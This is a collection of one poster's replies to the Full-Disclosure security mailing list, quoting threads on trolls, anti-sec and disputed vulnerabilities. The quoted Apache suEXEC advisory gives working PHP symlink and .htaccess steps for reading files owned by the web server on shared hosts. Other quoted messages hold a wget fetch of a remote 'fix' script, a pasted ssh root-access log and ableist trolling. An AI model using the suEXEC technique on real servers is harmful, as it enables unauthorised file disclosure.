Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D
On 3/17/14, Mario Vilas wrote:
> ROFL
>
> [image: Inline image 1]
>
>
> On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim
> wrote:
>
>> What drugs are you on Pedro Ribeiro I wonder ...?
>>
>> I express my views, if you don't like don't watch them. You responses so
>> far have only been assy speculations so don't tell me Im wrong , and
>> please
>> don't say thing like that. I don't know who the other people is, but
>> what
>> is true in security I support. Why you would Google my name ... ?
>>
>> Is the English language causing you ill effects?
>>
>> --- ped...@gmail.com wrote:
>>
>> From: Pedro Ribeiro
>> To: timbra...@techemail.com
>> Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski <
>> lcam...@coredump.cx>, mvi...@gmail.com, gynv...@coldwind.pl
>>
>> Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
>> Date: Mon, 17 Mar 2014 09:24:08 +
>>
>>
>> On 16 Mar 2014 23:36, "T Imbrahim" wrote:
>> >
>> > The thread read Google vulnerabilities with PoC. From my understanding
>> it was a RFI vulnerability on YouTube, and I voiced my support that this
>> is a vulnerability.
>> >
>> > I also explained a JSON Hijacking case as a follow up, and you said you
>> didn't follow. So I am just saying that treating security that way,
>> there
>> are other parties like NSA who welcome them happily.
>> >
>>
>> I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock
>> puppets.
>>
>> They are all first time posters from unusual free email providers jumping
>> to defend the OP out of nowhere. If you search Google for their emails
>> you
>> only find references to this thread.
>>
>> They present similar (false and /or incorrect) arguments, talk about
>> their
>> extensive work experience, bash Google and its security team and send
>> repeated emails with exactly the same text.
>>
>> This is turning into a madhouse... I hope this guy doesn't have access to
>> a gun.
>>
>> Regards
>> Pedro
>>
>>
>> --
>> Are you a Techie? Get Your Free Tech Email Address Now! Visit
>> http://www.TechEmail.com
>>
>
>
>
> --
> "There's a reason we separate military and the police: one fights the enemy
> of the state, the other serves and protects the people. When the military
> becomes both, then the enemies of the state tend to become the people."
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
How the hell did you ever think Google will honor this? By now they
could be fixing this issue, they hell don't care about you.
On 3/15/14, Georgi Guninski wrote:
> Is it possible with the help of Godwin's law
> this discussion moves offlist?
>
> --
> guninski
>
> On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote:
>> Google vulnerabilities uncovered...
>>
>>
>> http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml
>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
One thing u gotta remember most of the Admins who handle webservers in
a network are also developers since most of the organizations will
always need to cut on expenses, and as we know, most of the developers
will just look into finishing work and making it work. So if something
doesn't run due to httpd.conf, you will find these guys loosening
server security, therefore opening holes to the infrastructure.
Just my two cents
./Chucks
On 8/10/13, Kingcope wrote:
> Uhh Hit em with a little Ghetto Gospel
>
> So am i less holy Because i Puff a blunt and Drink a Beer with my homies?
>
> Theres no Need for you to fear me if you Take your Time and Hear me Maybe
> you can learn to cheer me.
> It aint about Black and white cause we Human !!!
> Lord can you Hear me speaaak!!
> http://rapgenius.com/2pac-ghetto-gospel-lyrics
>
> Am 09.08.2013 um 16:33 schrieb Kingcope
> :
>
>> So the blackhat that Sits on ur Site and the site of ur company Since half
>> a year will stop at the point Where its "technically incorrect" and wont
>> escalate to root because "it doesnt have to do Anything with suexec". Its
>> an Old vuln so let it stay , better for us and soon our Data on your
>> boxes.
>>
>> Time to Write a Real Root exploit and dont waste the Time with sysadmins
>> that know how to set a flag in httpd.conf , apache devs included.
>>
>> Am 09.08.2013 um 14:29 schrieb Kingcope
>> :
>>
>>> So what your Emails Tell me is better ignore this vulnerability. I dont
>>> Claim its a High severity Bug but if you Tell People to ignore it Because
>>> it isnt a vulnerability you are very much aiding the Chaos of insecurity
>>> in the Internet today. You Maybe have a Secure Setting but theres only
>>> you on the Planet. Attackers Look specifically for such Bugs to Open
>>> Servers. No Wonder we have compromises in a High Scale every Day due to
>>> this ignorance. My rant on that One.
>>>
>>> Am 07.08.2013 um 21:49 schrieb king cope
>>> :
>>>
Apache suEXEC privilege elevation / information disclosure
Discovered by Kingcope/Aug 2013
The suEXEC feature provides Apache users the ability to run CGI and SSI
programs
under user IDs different from the user ID of the calling web server.
Normally,
when a CGI or SSI program executes, it runs as the same user who is
running the
web server.
Used properly, this feature can reduce considerably the security risks
involved
with allowing users to develop and run private CGI or SSI programs.
With this bug an attacker who is able to run php or cgi code inside a
web
hosting environment and the environment is configured to use suEXEC as
a
protection mechanism, he/she is able to read any file and directory on
the file-
system of the UNIX/Linux system with the user and group id of the
apache web server.
Normally php and cgi scripts are not allowed to read files with the
apache user-
id inside a suEXEC configured environment.
Take for example this apache owned file and the php script that
follows.
$ ls -la /etc/testapache
-rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
only user www-data should be able to read this file.
$ cat test.php
>>> system("id; cat /etc/testapache");
?>
When calling the php file using a webbrowser it will show...
uid=1002(example) gid=1002(example) groups=1002(example)
because the php script is run trough suEXEC.
The script will not output the file requested because of a permissions
error.
Now if we create a .htaccess file with the content...
Options Indexes FollowSymLinks
and a php script with the content...
>>> system("ln -sf / test99.php");
symlink("/", "test99.php"); // try builtin function in case when
//system() is blocked
?>
in the same folder
..we can access the root filesystem with the apache uid,gid by
requesting test99.php.
The above php script will simply create a symbolic link to '/'.
A request to test99.php/etc/testapache done with a web browser shows..
voila! read with the apache uid/gid
The reason we can now read out any files and traverse directories owned
by the
apache user is because apache httpd displays symlinks and directory
listings
without querying suEXEC.
It is not possible to write to files in this case.
Version notes. Assumed is that all Apache versions are affected by this
bug.
apache2 -V
Server version: Apache/2.2.22 (Debian)
Server built: Mar 4 2013 21:32:32
Server's Module Magic Number: 20051115:30
Server loaded: APR 1.4.6, APR-Util 1.4.1
Compiled using: APR 1.4.6, APR-Util 1.4.1
Architecture: 32-bit
Server MPM: Worker
threaded: yes (fixed thread count)
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
What happened to the link.
On 6/8/13, kai wrote:
>> wget http://botslayer.ru/final_solution.txt
>
> i've registered this domain just to save incompetent shitheads who blindly
>
> run any code which is supposed to "fix security problem". why have you
> included the non-existent domain in your code?
>
> thanks for your interesting investigation anyway.
>
>
> Cheers,
>
> Kai
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LulzSec EXPOSED!
I think its just a bruteforce.
On 6/6/11, Andreas Bogk wrote:
> Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
>> Lulzsec == pwnt
>
> I've seen the log you pasted to pastebin. Is this:
>
> * A timing attack on ssh passwords over the net?
> * Fake, to distract us from your real 0day?
>
> Andreas
>
> Log:
>
> root@gibson:~# ./1337hax0r 204.188.219.88 -root
> Attempting too hax0r root password on 204.188.219.88
>
> h,VhXz 3xL ffsakTgyc~H
> ZZrz,pJrg b{4Bv_Y$$Z6
> XDh;vDU-;3>
> FB-hvg%g_'t
> }qHNvkS"'>g
> RNBKvUi5yO|
> z`(}v<1^>u&
> *V4?vh9#^f2
> /R*9vf 9P65vjKhh.N
> \rfsv~PhNDz
>>Bfpv|uhGpy
> J%"kvf]hGf0
> sY0"v{2hf7p
>>9dev%Qh6_v
> * }:lkvV^hN2U
> ;&5Xv'Sh#}_
> MOqpvi_hg+#
> Md9/viVh&u7
> M(%rvomhb'"
> MI"5v_shEVe
> M=@?vl.hZge
> MPk5v:WhUTe
> M=3vvrzh7Te
> M&'?v]sh`Te
> M/Z,vI1h`Te
> M.9>vO$hTTe
> Ms!(vY;hpTe
> MA)SvYLhnTe
> M7eCv@Lh0Te
> MkeCvFLh$Te
> M'eCv?LhaTe
> M&eCvLLh|Te
> M*eCv5Lh\Te
> MmeCvcLhCTe
> MTeCv&LhrTe
> M,eCv1LhYTe
> MEeCv}LhHTe
> M_eCvSLhnTe
> MPeCvSLh+Te
> M[eCvSLh,Te
> MOeCvSLh"Te
> M7eCvSLh"Te
> MGeCvSLhdTe
> M$eCvSLhkTe
> MCeCvSLhkTe
> MLeCvSLhkTe
> M=eCvSLhkTe
> M-eCvSLhkTe
> MweCvSLhkTe
> M=eCvSLhkTe
> M3eCvSLhkTe
> M6eCvSLhkTe
> MreCvSLhkTe
> M6eCvSLhkTe
> MFeCvSLhkTe
> MSeCvSLhkTe
> M8eCvSLhkTe
>
> Password hax0rd! root password: M8eCvSLhkTe
>
> root@gibson:~# ssh 204.188.219.88
>
> root@204.188.219.88's password:
>
> root@xyz:~# hostname; id; w
> xyz
> uid=0(root) gid=0(root) groups=0(root)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor
God, i cant even understand half the shit he is saying? English so upside down!
On 12/17/10, Christian Sciberras wrote:
> HAHAHAHAHAH!!
>
> GOD so are funny you!11
>
>
>
>
> 2010/12/16 musnt live
>
>> OpenBSD is Backdoor facts
>>
>> 1) Is we look to monkey.org posting, we is see Theo make is change to
>> CVS for this portion of code is work on by Jason (name is mentioned by
>> Perry)
>>
>> 2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6,
>> musn't live theorize 2.6
>>
>> * 2.6: December 1, 1999 -
>> * Based on the original SSH suite and developed further by the OpenBSD
>> team, 2.6 saw the first release of OpenSSH, which is now available
>> standard on most Unix-like operating systems and is the most widely
>> used SSH suite.
>>
>> http://en.wikipedia.org/wiki/Timeline_of_OpenBSD
>>
>> 3) Is Theo not deny there is no backdoor, only say he is unaware
>> (musn't live is unaware of exact time right now, is know time exist!)
>> a) Theo and OpenBSD not audit anything (trusting trust)
>> b) pre-emptive "is wasn't me" from Theo in event truth comes later
>> "Hey I is Theo I do right thing and strike err.. Disclose first! I not
>> know!"
>> c) all of is the above
>>
>> 4) While is everyone claim Perry прил, is no one else outside of Jason
>> on OpenBSD is say: "Perry is lying" even former developers is stay
>> quiet to protect the DARPA/FBI innocent
>>
>> 5) Is possible at people by mentioned in named by Perry, go to Canada
>> to "hack code" and plant is backdoor
>>
>> 6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is
>> controlled by those is accused, quick move and we is have: "See is no
>> backdoor in this backdoor!"
>>
>> 7) OpenBSD is the most secure backdoored on the planet
>>
>> 8) Is need slogan change: "Only two remote holes in the default
>> install, in a heck of a long time! (Is besides backdoor!!!)"
>>
>> 9) We is all peons to Theo and we is cannot figure out truth as we is
>> brains are so too small
>>
>> 10) Claims surpass is Microsoft NSA theory
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny.
On 3/21/10, Andrew Walberg wrote:
> Hello.
>
> Everyone here has learned there lesson and has suffered because Andrew
> Wallace ("n3td3v") has been banned.
>
> n3td3v is a multi-national organization of national security experts who
> have been driven to the underground thanks to John Cartwright. Since then,
> mossad has been able to infiltrate and cause significant global problems.
>
> n3td3v was offended and furious. He doesn't have 0day. He doesn't hack.
>
> Unban Andrew Wallace and let the information be free.
>
> If you unban him we will finally have justice in this world for n3td3v and
> his 5000 employees. Everyone at our office is waiting for your answer, John
> Cartwright
>
>
> __
> Do You Yahoo!?
> Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz
> gegen Massenmails.
> http://mail.yahoo.com
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
Especially the ones working for governments, the surveillance and
espionage etc, scares more
On 1/4/10, netinfinity wrote:
> I couldn't agree more with Adriel.
>
> --
> netinfinity
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
One of the amazing thing about these hackers calling them antisec
didn't have real hardening on their servers. Most of their servers had
direct public ip on their Interfaces and even their user management
was crappy.
I remember when i heard of antisec i thot these guys were real gurus
with more than 10 years of experience, but after the fake sshd and
fake attacks, and DDOS that meant nothing and now all is lulz, i cant
help but rofl.
./Chuks
On 1/2/10, Jeff Blaum wrote:
> It still does not change the fact that you (Glafkos) are a cock, and that
> astalavista is (and was) always a shit stain of a website.
>
> J
>
> On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous
> wrote:
>
>> .
>> |
>> \ * ./
>>. * * * .
>> -=* LULZ! *=-
>> . .* * * .
>>/* .\
>> |
>> .
>>
>> _ _
>> ( ) ( )
>> | |_| | _ _ _ __ __ _
>> | _ | /'_` )( '_`\ ( '_`\ ( ) ( )
>> | | | |( (_| || (_) )| (_) )| (_) |
>> (_) (_)`\__,_)| ,__/'| ,__/'`\__, |
>> | || |( )_| |
>> (_)(_)`\___/'
>> _ _ _ _
>> ( ) ( )( ) ( )
>> | `\| | __ _ _ _ `\`\_/'/'__ _ _ _ __
>> | , ` | /'__`\( ) ( ) ( )`\ /'/'__`\ /'_` )( '__)
>> | |`\ |( ___/| \_/ \_/ | | |( ___/( (_| || |
>> (_) (_)`\)`\___x___/' (_)`\)`\__,_)(_)
>> anti-sec.com
>> .
>> |
>> \ * ./
>> . * * * .
>>-=* RAWR! *=-
>>. .* * * .
>> /* .\
>> |
>> .
>>
>> http://www.anti-sec.com
>> http://pastebin.com/f12f6f9c0
>> http://pastebin.mozilla.org/694145
>> http://pastebin.ca/1733192
>>
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cyber War Conspiracy
K, full-disclos...@safe-mail.net or whoever you are, i think you are
watching too much of 24 or even Spooks. Please quit and relax abit!!!
./Chuks
On 12/5/09, Paul Schmehl wrote:
> --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:
>
>>
>> On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:
>>
>>> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
>>> jdl and valdis.
>>
>> He might be those other dudes, but he's not me. If I was going to pose
>> as
>> a troll, I'd pose as a more clueful troll - trying to think that
>> cluelessly
>> makes my brain hurt.
>>
>> On the other hand, nobody's ever seen me and Paul Schmehl at the same
>> place
>> at the same time... I wonder why... :)
>
> Because we have no travel money. :-)
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> **
> WARNING: Check the headers before replying
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v mentioned in a book?
Maybe its not a Ban, maybe its a burn notice!
On 10/4/09, full-censors...@hushmail.com wrote:
> if this guy is mentioned in a book and we banned him?
>
> http://f0rb1dd3n.com/links.php
>
> i'm calling for a serious review of whats going on with the ban
> list.
>
>
>
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers
Thank you for this my.hndl. There are some issues i have been having
and seems your methodology may work on Fedora and others OSs.
Thankx
./Chuks
On 9/30/09, maxigas wrote:
> From: "bo...@civ.zcu.cz"
> Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials
> from Attackers
> Date: Wed, 30 Sep 2009 00:03:51 +0200
>
>>> All standard users have read access to /var/log/auth, so if root
>>
>> they shouldn't, at least on my default debian they don't ...
>
> On my default Ubuntu, users in "adm" group have reac access to the
> authentication log file:
>
> m...@machine: ls -l /var/log/auth.log
> -rw-r- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log
>
> --
> ×× maxigas
> // villanypásztor / kiberpunk / web shepherd //
>
> -= Important communication disclaimer: by replying to my emails you are
> disclaiming all your disclaimers. =-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v's Twitter account hacked
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter.
On 9/19/09, The Security Community wrote:
> Someone evidently hacked into n3td3v's Twiiter account and is spewing
> nonsense.
>
> http://twitter.com/n3td3v
>
> Maybe it's some sort of botnet C&C account now, I dunno.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Moar iProphet questions
Now, i think this is really wrong. There is no need of making fun of
someone who is disabled by attacking n3td3v.
On 8/29/09, Gary McKinnon wrote:
> iProphet (weev) Questions
>
> Sorry for being repetitive. FD is mostly hoarsechit and fucin
> around anyway (not that you do ANY of that).
>
> My name is Gary McKinnon, I'm the "nerd" that hacked into the
> Pentagon. I'm autistic so I may have difficulty communicating or
> understanding you.
>
> HELLO? Can you hear me?
>
> I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions
>
> 8==^H^H^H^H^HD
>
> 1.) Do you have HIV?
> 2.) Have you ever anointed anyone with your IRL "Virus"?
> 3.) Do you think that you could be prosecuted for hacking if you
> give people your IRL badware?
> 4.) Do the woman you give HIV to go to heaven?
> 5.) What does your computer screen look like? You run linux? Do you
> have an iProphet wallpaper?
> 6.) When will we be seeing new vlogcasts
> 7.) Do you plan on writing some subversive PDF's for us?
> 8.) Do you intend on making a documentary so it can go viral and
> cause a revolution?
> 9.) In your mind, what is your picture of an ideal world?
>
> This post was by Gary McKinnon [SOLO], elite autistic hacker.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut.
Thankx
./Chuks
On 8/13/09, secrev...@hushmail.me wrote:
> Hi Everyone,
>
> We received a lot of emails from different people asking us what
> happened to our blog at http://secreview.blogspot.com. What
> happened is we decided to shut down operations because we don't
> have time to keep doing reviews. We also don't have time to redo
> reviews which is needed to keep the reviews fair. We all have full
> time jobs and recently have been traveling a lot.
>
> We started secreview because we wanted to expose security companies
> for what they really were. But now because we can't do it any more
> we don't think its fair that only some companies get reviewed and
> others don't. So we deleted the blog (but we have 90 days to bring
> it back if people want it).
>
> If we do bring it back, we will probably not do any more reviews
> and we will leave it up just because. Do people want the blog to be
> recovered or do they want us to keep it dead?
>
> -- Secreview
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)
Just read this. What happened to your blog, http://secreview.blogspot.com? On 8/11/09, secreview wrote: > We received 22 requests from different people to perform a review of > Redspin! Their website can be found at http://www.redspin.com. We > haven’t done a review of anyone in quite a while, the last review that > we did was for Pivot Point Security who got an A (we still recommend > them). We apologize for this long delay but we have been very busy > traveling (yes we still have jobs doing consulting work sometimes). > > As you can see from the comments that we received in other posts we > have a lot of catch up work to do, but to be honest we are not sure > that we will be able to do it. This review might be our final and last > review depending on how much more travel we have. (We have lives, some > of us have families, and we can’t keep doing this for free even though > we feel that this is a great service). > > We did a lot of research on Redspin and we managed to get a copy of two > reports that they did for two different customers. We won’t share those > reports with you because that would be unethical, don’t ask. > > Redspin claims that it is a “pure penetration testing firm”. What they > mean by “pure penetration testing” is that they do not resell third > party software or hardware. They also say that “don't find problems on > your network so that [they] can make more money; [their] penetration > testing services reveal vulnerabilities, [that] will help you become > more secure.” > > We verified their claim with our own research. Redspin will not try to > sell you software or hardware… but they might try to sell you software > as a service. (see their www.jetmetric.com website). > > Redspin takes it a step further and is brutally honest about their > methodology for delivering penetration-testing services. They openly > admit that their services rely on automated vulnerability scanners > (Nessus) and are enhanced by manual testing. In fact, Redspin says that > automated scanners “can miss about 40% of the security risk so they > alone do not adequately assess risk. Furthermore, about half of the > findings from a vulnerability scan are false positives”. > > Any security company that relies on automated scanners can weed out > false positives, but doing that doesn’t really increase the depth and > accuracy of testing. A false positive, also known as an error of the > first kind, or a Type I Error, is the rejection of a null hypothesis > when it is in fact true. In more simple terms, this is the error of > observing a difference when in fact there isn’t one. Identifying false > positives is fairly easily done, as it only requires inspecting the > results produced by a scanner. > > But what about False Negatives? A False Negative, also called a Type II > Error, or an error of the second kind, is the error of failing to > reject a null hypothesis when it is in fact not true. More simply, a > False Negative is the error of failing to observe a difference when in > truth there is one. So, if an automated vulnerability scanner tests a > vulnerable service (a known vulnerability) but the scanner doesn’t > detect the vulnerability then the vulnerability is excluded from the > report. If this is the case then Redspin’s methodology will break down > because there will be no result in the report for Redspin to manually > test. That vulnerability will fly under the Redspin radar but might not > be missed by a hacker. So how many vulnerabilities does Redspin miss? > It’s a question worth asking. > > Redspin does say that “vulnerability scanning is not suitable on its > own as a complete or billable service offering, it does provides some > value in the early reconnaissance phase of a more comprehensive > External Network Security Assessment”. They have a typo in that > sentence, but other than that, they are right. Vulnerability scanning > does have a position in the industry and is a huge time saver, > especially when testing large numbers of systems. Just don’t rely on > one vulnerability scanner like Redspin does, use two or more like the > OSSTMM proposes. > > Redspin says “manual analysis is at the heart of all of [their] > assessments which not only gives you confidence that you have a > complete view of your security risk, but provides tailored reporting > and recommendations enabling simple work-arounds and cost-effective > mitigation strategies for most security issues.” Based on our research > Redspin’s “manual analysis” isn’t what we expected it to be. It is not > based on vulnerability research and is strictly based on the inspection > and verification of scanner output. > > What we can say is that their “manual analysis” doesn’t produce the > highest quality reports that ever we’ve seen, but it does produce > reports that are higher than average quality. The Redspin reports have > very few, if any, False Positives but will contain more False Negatives > than a report that is centered on sol
Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)
i thought the same thing. This guy shud get a life!!!
On 8/9/09, Zloss wrote:
> So what the heck are you doing dumbass ?
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] anti-sec: OpenSSH <= 5.2 zero day exploit code - 48 hours until it is publicly released!
hahaha, now u r releasing it
I thought u guyz dont release or disclose vulnerabilities.
./Chuks
On 7/20/09, Ant-Sec Movement wrote:
> Dear Reader,
> In 48 hours, the anti-sec movement will publicly unveil working exploit code
> and full details for the zero-day OpenSSH vulnerability we discovered. It
> will be posted to the Full-Disclosure security list.
>
> Soon, the very foundations of Information Technology and Information
> Security will be unearthed as millions upon million of systems running ANY
> version of OpenSSH are compromised by wave after wave of script-kiddie and
> malicious hacker.
>
> Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
> anti-sec will be unleashing powerful computer worm source code with the
> ability to auotmatically find and compromise systems running any and all
> versions of OpenSSH.
>
> This is an attack against all White Hat Hackers who think that running a
> Penetration Test simply searching for known vulnerabilities is all they have
> to do in order to receive their payment. Anti-sec will savor the moment when
> White Hat Hackers are made to look like fools in the eyes of their clients.
>
> Sincerely,
>
> -anti-sec
>
--
--
Gichuki John Ndirangu,
